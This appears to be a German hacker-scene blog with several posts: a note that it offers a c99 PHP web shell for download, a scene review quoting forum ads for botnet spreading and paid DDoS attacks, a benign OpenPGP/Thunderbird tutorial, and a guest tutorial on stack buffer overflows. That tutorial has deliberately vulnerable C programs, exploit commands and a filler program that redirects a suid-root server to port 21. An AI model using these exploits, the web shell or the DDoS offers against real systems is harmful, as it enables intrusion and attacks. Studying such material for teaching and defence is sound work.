McAfee SiteAdvisor found potential security risks with this site

J0hn.X3r / / Allgemein

Wurd letztens mal angeschrieben, weil meine Seite hier gelistet wird:

http://www.siteadvisor.com/sites/j0hnx3r.org

Der Text ist auch begruessend:

McAfee TrustedSource web reputation analysis found potential security risks with this site. Use with extreme caution.

Das beste sind die 2 Reviews dazu:

Malicious site listed at freepcsecurity.co.uk – keep clear.
It is one of the malicious and rogue sites which may compromise your PC Security. Some may contain driveby downloads, trojans, backdoor bots, rootkits, rogue programs (PUPs), unwanted adware/spyware and all are to be considered a threat.

WARNING THIS SITE POSES SERIOUS SECURITY THREATS: Threats on this and other malware sites may include fake antivirus scams, malicious redirects, viruses, trojans, rogue installers, key loggers, droppers, browser exploits, and a range of other security threats. Avoid malware sites. Do not become their next victim.

See Here: http://www.freepcsecurity.co.uk/2010/09/30/malicious-sites-september-30/

Und ich hab die Ehre dort aufgelistet zu sein:

http://www.freepcsecurity.co.uk/2010/09/30/malicious-sites-september-30/

Passt also ja auf, wenn ihr meinen Blog besucht, lol 😉

Bevor sich paar Leute ernsthafte Gedanken machen, diese “Meldung” erschien nur, weil ich hier seit laengerem ne c99 shell im .txt format zum freien “Download” anbiete.. http://j0hnx3r.org/c99.txt (atm noch nicht geuppt, nach dem Umzug).

Dark-Elite & Umzug

J0hn.X3r / / Allgemein

Da die letzten Tage einiges los war, kommt hier nun mal ein normaler Blogeintrag mitm kleinen Statement ueber die letzten Tage.

Bei meinem letzten Blogeintrag, habe ich wieder einmal neue Projekte vorgestellt und meine Meinung dazu veroeffentlicht, zu dem Bericht ueber Dark-Elite kamen bei mir leider Drohungen in den Kommentaren an, von wegen “ich solle ihn entfernen”, ansonsten sei ich “down”. Natuerlich bin ich darauf nicht eingegangen, da ich niemanden direkt angegriffen habe, sondern meine Meinung dazu veroeffentlicht habe. Die Drohungen wurden dann jedoch “wahr” und so war mein Blog am 6.10.2010 nicht erreichbar.

Nachdem CINIPAC es einigermaßen wieder hinbekommen hat, war mein Blog kurzzeitig wieder online und stand dann wieder unter DDoS. Daraufhin folgte meine Antwort in der ich das Backup von Dark-Elite.biz, welches mir zugespielt wurde, veroeffentlicht hatte.

Am gleichen Tag, durfte ich auf dem Offiziellen WordPress Blog von Dark-Elite dann lesen:

Ihr habt bestimmt gemerkt, dass Dark-Elite down ist, dies ist sozusagen auf unseren Wunsch geschehen, da cr4ck und ich zur Zeit nicht allzu viel Lust haben weiterhin das Board zu leiten.

Gründe gibt es mehrere, ich kann hierbei auch aufs Team eingehen, sPloiT habe ich seit über einer Woche nicht mehr online gesehen, g0ethe einmal bisher diese Woche, usw.

Wir werden in den nächsten Tagen besprechen wie es weitergeht.

Möglicherweiße kommt es zu einem Verkauf.

Gruß eL!t3

Kontakt: 271-808

PS: Dark-Elite ddost keine Scene-Blogs. Dass jemand unter unserem Namen sowas schreibt, können wir nichts zu und ist auch nicht zu ändern.

Vorallem den letzten Satz fande ich interessant, daher mal die Kontakt UIN kontakiert und das ein oder andere mit eL!t3 abgesprochen und er hat mir versichert, dass er und das Team offensichtlich nicht dahinter stecken. Dann muss es wohl ein anderer D-E Fanboy sein, der es lustig findet, den Ruf von D-E durch solche DDoS Attacken runter zu ziehen. Vllt wird auch diese Person bald erwachsen.

Dann zu meinem zweiten Punkt, mein Blog hostete seit Ende Januar 2009 bei CINIPAC der Service war Anfangs richtig gut, jedoch kam in letzter Zeit immer mehr Kritik und negative Aspekte auf cinipac zu und nicht immer lief alles so, wie man es haben wollte.  Nichts desto trotz, habe ich dann von einer Person, bei dem ich urspruenglich 13.01.2009 meinen Blog gehostet hatte einen kostenlosen VPS erhalten. Der Vorteil von einem VPS gegen Webspace liegt klar auf der Hand und einem geschenkten Gaul, schaut man nicht ins Maul 😉 Daher nahm ich den VPS damals dankend an, hostete dort meine 10 TeamSpeak Server, welche ich auf F-H anbiete und nun seit heute auch meinen Blog drauf. Wundert euch also nicht wenn heute oder morgen der Blog kurzzeitig nicht erreichbar ist. In diesem Sinne Danke an CINIPAC fuer den Service die letzten Monate 🙂

Szene-Uebersicht

J0hn.X3r / / Szene News

Das ist schon wieder ziemlich lange her, als ich meinen letzten Blogeintrag gemacht hab – noch laenger ist es her, dass ich eine kleine “Wochenuebersicht” gepostet hatte. Es ist 4 Uhr morgens, ich hab langweile und Zeit dafuer!

Ich werd das ganze wieder in “Top und Flop” auflisten, wobei ich mit Top anfangen werde. Ich stelle uebrigens nur neue Projekte vor.

Zuerst beginne ich mit einem Vorwort, wie man auf Saltfish sehen kann, ist fast die Haelfte der Links in der Kategorie “German Scene/Coding Boards” Down/Offline – inzwischen nicht mehr, aber letzte Woche noch, Saltfish hat tote Links inzwischen aufgeraeumt, aber das aendert nichts am Ergebnis, dass viele neue “Szeneboards” mal wieder weg vom Fenster sind.

Top:
scriptzbase.org – seit dem 18.7.2010 nach 458 Tagen wieder zurueck! Nur leider hat das glaub ich noch nicht jeder mitbekommen, daher is dort weniger los als davor. Daher nochmal nen “Aufruf” von hier, Scriptzbase ist back und ihr koennt dort auch mal wieder vorbeischauen 😉 Bin dort auch anzutreffen.

OpCodez’s Blog – ist nun seit ueber ner Woche online und mit sehr viel gutem und interessanten Stuff gefuellt 🙂 Auch dort lohnt sich das vorbeischauen auf jedenfall! Daher von meiner Seite aus, viel Glueck & Erfolg mit deinem Blog, OpCodez und ich hoff das du lange und viele Ideen haben wirst.

underground-economy.biz – Gibts auch erst seit kurzer Zeit, aber das Design bzw. vorallem der Header sieht nett aus, dass Klima sieht relativ angenehm aus, ueber das Team laesst sich streiten, aber ansonsten macht es einen guten Eindruck.

Das waren nun die Tops, nun folgene die – aus meiner Sicht – Flops:

dark-elite.biz – die haben das Wort “Flop” verdient. Wieso? Erstens wird man mit einer massiven DDoS Protection konfrontiert, welche jede DDoS Attacke massiv abwehrt – damit meine ich die .htaccess Datei, wo man nervigerweise zweimal “ddos” eingeben muss, da der Admin die Hoffnung hat, dass HTTP DDoS Angeriffe geblockt werden – tut es zwar auch, aber nur minimalst.
Ein weiterer Knaller ist in den Boardnews der Thread:
” [Dark-Elite Botnet] Spreader gesucht ->Belohnung”

Hallo,
ich bin gerade dabei ein großes Botnet für Dark-Elite aufzubauen, habe dafür einen Root (Quadcore, 8GB RAM) gekauft, sowie einen Bot.
Die Server.exe ist FUD!
Wer Lust hat zu spreaden und somit Level 2 oder ukash verdienen will, kann sich ja bei mir melden 🙂

von dem Admin eL!t3, indem er User aufruft beim Spreaden fuer sein Botnet zu helfen.

Der Knaller ist ja, dass er dann anfaengt DDoS Service anzubieten – zu ueberteuerten Preisen!

Ich biete euch hier einen DDoS Service an, ich denke, dass ich alles down bekommen werde, was ihr bei mir bucht, aber sollte dies nicht der Fall sein, müsst ihr natürlich auch nichts zahlen.
Ich nehme mir heraus, bestimmte Seiten nicht zu DDoSen.

Preis für DDoS:
1 Stunde : 20 ukash
5 Stunden : 50 ukash
1 Tag : 100 ukash

Für individuelle Zeiten werden die Preise abgesprochen!

Was sind das bitte fuer ueberteuerte Preise fuer so einen Service? Muessen etwa die Spreader bezahlt werden? In der Regel wird 50eur pro Tag verlangt, er verlangt das doppelte fuer seine eigenen Member – Nice!

Das dort dann Beitraege wie

Also ******faking ging damit locker down 😛

folgen ist natuerlich klar. Und dann wundert man sich, wieso man DDoS abbekommt, wenn man andere Seiten mit DDoS attackiert – sinnlose “Internetkleinkriege”.

flavours.cc – zuerst wird man wieder von einem .htaccess fenster begruesst worauf man wieder zweimal “ddos” eingeben muss – dann zum Projekt selbst, an sich ist es in Ordnung, nur heißt er in der Projekt-Vorstellung:

[…]Nach einer längeren Downtime und einem inkompetentem Team ist Flavours.CC jetzt wieder am Start. Diesmal ohne Carding und Faking, was hier wohl eher auf Anklang stoßen sollte.
[…]

Ein Blick in die letzten 10 Beitraege uebersicht:

Fail, oder? Ich frag mich auch, was dort Sektionen wie “Drops” und “Ware” zu suchen haben, wenn man “diesmal ohne Carding und Faking” durchstarten moechte – das sollte definitiv nochmal ueberdacht werden.

Soviel dazu erstmal, dass waren meiner Meinung nach wichtige Projekte, welche ich vorstellen wollte, Projekte bei denen das Thema “Internetbetrug” zu intensiv angesprochen werden, stelle ich hier sowieso nicht vor, da es nicht in meinem Interesse liegt.

Bis demnaechst.

OpenPGP verschluesselte eMails senden und empfangen

J0hn.X3r / / Tutorials

Hallo liebe Blog Leser,

lang ists her, als ich meinen letzten Beitrag geschrieben hab – leider. Gruende gibts einige, zum Beispiel, dass mein alter Laptop Bildschirm kapput war und der neue wollte einfach nicht kommen. Erst meldet sich der Shop nach 3 Wochen und meint “Artikel nicht Lieferbar” – dann nach einer Woche immernoch nicht Geld zurueck, paypal konflikt gemeldet und dann kam das Geld relativ schnell. Der zweite Shop hatte dann auch noch Lieferprobleme.. nichts desto trotz ist er nun da (seit 2 Wochen etwa) und ich kann wieder bloggen. Ein anderer Grund war die fehlende Motivation.

Nun aber zum eigentlichen Thema, da ich meinen PGP eMail Key erneuern wollte und auch das Addon neu installiert habe (inzwischen unterstuetzt es auch 64bit Systeme unter Linux problemlos), dachte ich mir, ich mach ein Tutorial fuer euch. In diesem werde ich Thunderbird benutzen und mich auch nur auf ihn beziehen.

Was wird benoetigt?
– Ein eMail Client der PGP verschluesselte eMails unterstuetzt – ich empfehle euch Thunderbird, weil es dafuer ein echt klasse Addon gibt.
GnuPG muss installiert werden bzw. vorhanden sein
– Enigmail Addon installieren (bei Thunderbird)

Voraussetzungen erfuellen
Auf die Installation von Thunderbird muss ich wahrscheinlich nicht weiter eingehen, daher nun zu GnuPG, auf der Herstellerseite gibt es das sowohl fuer Windows (man wird weitergeleitet) als auch fuer Linux zum Download.

Windows User waehlen diesen Weg: http://www.gpg4win.org/
Linux User werden es in einigen Distributionen schon in den repos haben.

(X/K/..)Ubuntu/Debian/Linux Mint/BackTrack…

sudo apt-get install gnupg

Arch Linux:

sudo pacman -S gnupg

Wenn das nun installiert ist, schauen wir uns das Thunderbird Addon Enigmail an – den aktuellen Downloadlink gibts auf der Herstellerseite – einfach auf Download, OS & eMail Client auswaehlen und auf Download klicken. Danach einfach die .xpi Datei runterladen und irgendwo speichern.

Nun Thunderbird starten, auf Tools –> Addons gehen, install –> die .xpi Datei suchen, 3sek warten und installieren. Thunderbird neustarten.

Nun sehen wir oben einen weiteren Punkt im Thunderbird, naemlich “OpenPGP”.

Key erstellen

Nun wollen wir einen Verschluesselungs-Key fuer deinen eMail Account erstellen.

Klickt oben auf OpenPGP –> Key Management –> Generate –> New Pair

Zuerst waehlt ihr nun euren eMail Account aus, dann entscheidet ihr, ob ihr ein Passwort verwenden wollt – d.h. bevor ihr eine verschluesselte Mail oeffnet, muss euer PW eingegeben werden. Empfiehlt sich meiner Meinung nach, weil jemand der an eurem PC ist und die Mail dann lesen moechte muss erst das PW eingeben – jedoch kann man sich auch entscheiden kein PW zu benutzen.
Standardmaessig laeuft der Key nach 5 Jahren ab und sollte dann erneuert werden, solltet ihr einen anderen Zeitraum wuenschen, so waehlt es dort aus. Solltet ihr wuenschen das der Key niemals mehr ablaufen soll, macht nen haken in die Checkbox rein.

Nun sollte es in etwa so aussehen:

Schaut nun noch am besten den zweiten Tab an, dort koennt ihr eure Verschluesselung und die Staerke waehlen.

Ich empfehle euch RSA mit einem 4096 Bit Key, in der heutigen Zeit gilt jedoch auch ein 1024 Bit Key “noch” als sicher, 2048 reicht normal auch voll und ganz als Standard aus.

Aussehen solle es dann in etwa so:

Danach ein klick auf “Generate Key” und diesen Bestaetigen. Je nach dem wie stark eure gewaehlte Verschluesselung ist (1024 geht relativ fix, 4096 dauert wenige Minuten).

Danach werdet ihr gefragt ob ihr einen revocation key erstellen wollt, beispielsweise wenn ihr euren secret key verliert, um euren aktuellen key dann zu “deaktivieren” quasi – habs nie gebraucht, aber klickt einfach mal auf Generate.

Nun ist der Vorgang zuende und ihr koennt es einsetzen.

Public Key raussuchen

Wenn euch nun jemand eine verschluesselte eMail schicken will, braucht er euren public Key. Klickt unter Key Management wieder auf euren Key, rechtsklick und dann entweder in eure Zwischenablage kopieren, oder als Datei ausgeben lassen, ich empfehle es als Datei ausgeben zu lassen –> “Export Public Keys only”, irgendwo hinspeichern. Diesen Key koennt ihr nun auf euren Internetseiten veroeffentlichen und wer euch eine verschluesselte eMail senden will, muss diesen Key benutzen.

So, wenn ihr nun jemandem eine verschluesselte eMail schicken wollt, sucht ihr nach seinem Public Key. Diesen ladet ihr euch runter oder kopiert ihn in euren Zwischenspeicher und klickt auf

File –> Import Keys from File
oder
Edit –> Import Keys from Clipboard

Doppelklick auf die .asc datei reicht normal auch aus.

Verschluesselte eMail versenden und empfangen

Dort normal auf “Verfassen” klicken, dann seht ihr da nen tollen OpenPGP Button, anklicken haken rein bei “encrypt message” bzw in der deutschen Version sollte es “nachricht verschluesseln” oder so heißen. Danach auf versenden klicken, ggf. euer PW eingeben und ab geht die Post.

Wenn nun alles geklappt hat, sollte euer Partner diese eMail verschluesselt erhalten haben. Wenn er diese Lesen will, muss er sein PW – falls er eins gewaehlt hat – eingeben.

Genauso ist es, wenn ihr eMails empfangt.

Das wars dann auch soweit von meinem Tutorial, ich hoff es war einigermaßen verstaendlich fuer jedermann/frau.

Die Tage wird vllt ein Tutorial bezueglich Wlan verschluesselungen “knacken” erscheinen, welches ich mal angefangen hatte. Status ist bei ~ 35% oder mal wieder “Scene News” bezueglich neuen Scene Boards, eventuell eine kleine Bewertung dazu und irgendwann kommen auch meine Interviews mit relativ bekannten Scene Board Betreibern oder so, mal schaun.

Advanced Stack-Bufferoverflows

J0hn.X3r / / Tutorials

Eine Art “Tutorial”, welches ich von “frechdachs1337” zugesandt bekommen habe. Ganz nuetzlich, mag es euch daher nicht vorenthalten 😉

tutorial[0] – Einleitung

Dieses Tutorial behandelt die Problematik von dem begrenzten Überschreiben von Variablen.

Jeder kennt die 0815 Overflows wie: strcpy(text, argv[1]) ….. LANGWEILIG!
Doch was bleibt uns überrig wenn man zwar aus dem Speicherbereich der
ursprünglichen Variable “ausbrechen” kann aber nicht bis zur RET kommt sondern
nur andere Variablen die im weiteren Programmablauf genutzt werden
überschreiben kann, ja dann muss man kreativ werden!

tutorial[1] – Praktische Erklärung anhand eines komplett beknackten Beispiels ;D

  #include 
  #include 
  #include 
  
  int main (int argc, char **argv){
  	char h [] = "/bin/uname";
  	char text[100];
  
  	if(argc > 1)
  		strncpy(text, argv[1], 110);
  	printf("%s\n", h);
  	execl (h,h, (char *)0);
  	return 0;
  }

Hier ist es ganz offensichtlich: Wir können h mit 10 Bytes überschreiben.
h wird im nachhinein als Argument für execl benutz was für uns aüßerst
attraktiv ist. Hier ein kleiner und selbsterklärender Exploit-Log:

  ./test `perl -e 'printf "a"x110'`

aaaaaaaaaa

  ./test `perl -e 'printf "a"x100 . "/bin/ls\x00"'`

[LIST DIRECTORY EXECUTED]

Somit konnten wir das Überschreiben von unseren programmeigenen Variablen
erfolgreich auszunutzen.

tutorial[2] – Praktische Erklärung anhand eines komplett beknackten und
umfangreicherem Beispiel ;D

Folgendes Szenario: Wir sind auf einer Linux user-shell gelandet.
Wir haben keine Root Rechte finden allerdings ein suid-root Programm
+ Quellcode.

  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  
  int main(int argc, char **argv) {
  	int s,c, i;
  	socklen_t addr_len;
  	struct sockaddr_in addr;
  	char file_line[60];
  	char recvb[1024];
  	s = socket(AF_INET, SOCK_STREAM, 0);
  	if(atoi(argv[1]) < 1024)
  		return 1338;
  	addr.sin_addr.s_addr = INADDR_ANY;
  	addr.sin_port = htons(atoi(argv[1]));
  	addr.sin_family = AF_INET;
  
  	FILE *fp = fopen("prefs.cfg", "r");
  	for(i = 0; i < 65; i++)
  		file_line[i] = getc(fp);
  	fclose(fp);
  
  	bind(s, (struct sockaddr*)&addr, sizeof(addr));
  
  	listen(s, 3);
  
  	addr_len = sizeof(addr);
  	for(;;){
  		c = accept(s, (struct sockaddr*)&addr, &addr_len);
  		recv(c, recvb, sizeof(recvb), 0);
  		printf("%s\n", recvb);
  		close(c);
  	}
  	close(s);
  	return 0;
  }

Wie der Linuxgelehrte Leser sicher weiß, darf nur der Rootuser auf den Ports die
kleiner sind als 1024 lauschen. Dies wollen wir umgehen und mit unserem
Programm Packete ergaunern die auf schützenswerten Ports geschickt werden.
Wer das Programm selbst Exploiten möchten sollte hier aufhören zu lesen,
viel Glück!

Für alle anderen Schwachmaten:

  ....
  struct sockaddr_in addr;
  char file_line[60];
  ....
  FILE *fp = fopen("prefs.cfg", "r");
  for(i = 0; i < ---->65<-----; i++)
  		file_line[i] = getc(fp);
  fclose(fp);

Klingelts? Wir können die ersten vier Bytes von sockaddr_in addr überschreiben
indem wir die Datei prefs.cfg mit 65 Bytes füllen (Wir können gottseidank Nullbytes
verwenden).
Was nützt uns das?

  ...
  addr.sin_addr.s_addr = INADDR_ANY;
	--->>addr.sin_port = htons(atoi(argv[1]));
	addr.sin_family = AF_INET;
  ...

In addr stehen alle wichtigen Daten zur Verbindung für den Server.
Somit auch der Port! Nun müssen wir herausfinden wie diese vier Bytes
aussehen wenn wir z.b auf Port 21 lauschen wollen.
Dazu schreiben wir uns ein kleines Hilfprogramm welches wir Lokal ausführen:

  #include 
  #include 
  #include 
  #include 
  #include 
  #include 
  int main () {
  	struct sockaddr_in addr;
  	memset(&addr, 0x0, sizeof(addr));
  	addr.sin_addr.s_addr = INADDR_ANY;
  	addr.sin_port = htons(21);
  	addr.sin_family = AF_INET;
  	printf("%x\n", addr);
  	return 0;
  }

Dies gibt aus: 0x15000002
Das bedeutet: 0x1500 = Rückgabe von htons()
0x00 = Irgendwie zwingend vielleicht noch ein anderer Sinn.
0x02 = Die sin_family.

Somit brauchen wir uns nur noch ein Programm schreiben was uns die
pref.cfg entsprechend füllt und unser Victim starten.

  #include 
  #include 
  
  int main (){
  	char buffer[66];
  	memset(buffer, 'a', 64);
    buffer[60] = 0x02;
  	buffer[61] = 0x00;
  	buffer[62] = 0x00;
  	buffer[63] = 0x15;
  	FILE *fp = fopen("prefs.cfg", "w");
  	int i;
  	for(i = 0; i < 65; i++)
  		putc(buffer[i], fp);
  	fclose(fp);
  }

Hier unser finaler Log: 

  ./filler
  ./victim 5555
  [PACKETE AUF PORT 21]

Ich hoffe dieser wichtige Abschnitt war aüßerst verständlich.

tutorial[3] - Nachwort

Ich verzichte.